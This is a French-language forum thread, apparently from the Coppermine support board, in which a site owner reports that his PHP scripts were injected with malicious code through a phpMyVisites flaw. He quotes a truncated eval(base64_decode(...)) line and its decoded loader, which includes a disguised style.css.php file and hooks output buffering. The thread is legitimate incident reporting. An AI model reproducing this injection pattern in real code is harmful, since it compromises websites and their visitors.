Alerte Sécurité de PHPMYVISITS via fckeditor de minicms

[pbasmo]

Bonjour à tous

Tout d'abord excellente année à toute l'équipe ! Je sais qu'une nouvelle version de Coppermine est en route et on ne peut que lui souhaiter une longue vie !
Mais désolé d'être aussi alarmiste dans le titre de mon topic mais je pense qu'il y a matière à l'être !

J'explique :

Après avoir consulté mon site via FileZilla pour mettre en sécurité l'utilitaire phpmyvisits à cause d'une alerte de sécurité (voir http://www.phpmyvisites.us/#infohack) je me suis aperçu que TOUS les scripts du site ont été modifiés le même jour à la même heure (15/12/2009 à 00:05 environ).

J'ai donc téléchargé quelques scripts pris au hasard et j'ai constaté l'insertion d'un code malveillant en début de script.
En voici un extrait (avec des balises d'ouverture et fermeture php que j'ai omises ici) :

/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3..(suit une longue chaine en héxadécimal)....'));

Après l'avoir isolé et afficher le code en clair, voici ce qu'il raconte :

Code Select Expand


//*************************** Script parasite
/*
Après décodage, le script se base sur une fonction du plugins 'micicms'
et particulièrement du module fckeditor

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='(emplacement en clair de mon site sur le serveur free)/pierre.basmoreau/album/plugins/minicms/fckeditor/editor/filemanager/browser/mcpuk/connectors/php/Commands/helpers/style.css.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);

if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}
*/
//********************************



Autant dire que j'ai fermé rapidement le site, détruit tous les scripts sans distinction et reuploadé les versions originales de coppermine et autres utilitaires !

N'étant pas spécialiste de hacking, je ne sais pas trop le but de ce script. Il semble que la faille détectée dans phpmyvisits a contribué à insérer ce code malveillant et qu'il utilise une fonctionnalité de fckeditor présent dans le plugin 'minicms'.

AVIS A TOUS CEUX QUI UTILISENT PHPMYVISITS DANS LEUR SITE.

Je voulais vous mettre au courant rapidement.

Bonne continuation a tous.

(j'ai changé le sujet pour indiquer que c'est bien PhpMyVisits qui pose problème et non le plusgin minicms)

[François Keller]

Bonjour Pierre,
merci pour cette info. Malheureusement, minicms est pour le moment abandonné par son auteur, il n'y a donc pas eu de mises à jour depuis un moment, même si apparemment certains vont le rendre compatible avec cpg1.5.x.
Tout le problème est maintenant de savoir quelle était la version de coppermine (il y a eu des attaques du même genre il y a un certain temps (cpg1.4.18 si je me souviens bien) et la faille utilisée a été corrigée.
Concernant phpmyvisite, il semble bien que ce soit la faille trouvée qui a été utilisée... Je ne suis pas sur que ce soit minicms qui soit en cause, mais moi non plus je ne suis pas spécialiste.
EN tout état de cause, il est impératif lorsque l'on utilise des scripts de les mettre à jour très régulièrement dès l'apparition d'une nouvelle version pour limiter autant que possible ce genre de désagrément

[pbasmo]

Bonsoir François,

La version de coppermine était la dernière, 1.4.25 mais la version du plugin 'minicms' était la 1.7.
J'ai récupéré la version 2 de minicms et j'ai comparé le contenu de ces 2 versions. Il y a de grandes différences au niveau du module fckeditor :

-minicms version 1.7 avec fckeditor de 2006
-minicms version 2 avec fckeditor 2.6.5

Mais le plugin en lui-même n'est pas en cause.

Ce que je regrette de ne pas avoir fait dans ma précipitation est de récupérer le script php utilisé dans le code malveillant (style.css.php) car ce fichier n'existe pas dans fckeditor de la version 1.7 de minicms.
Il aurait été intéressant de connaître le code pour s'en protéger ultérieurement.

Mais de toute évidence il faut passer au successeur de phpmyvisit qui est Piwik.

Bonne continuation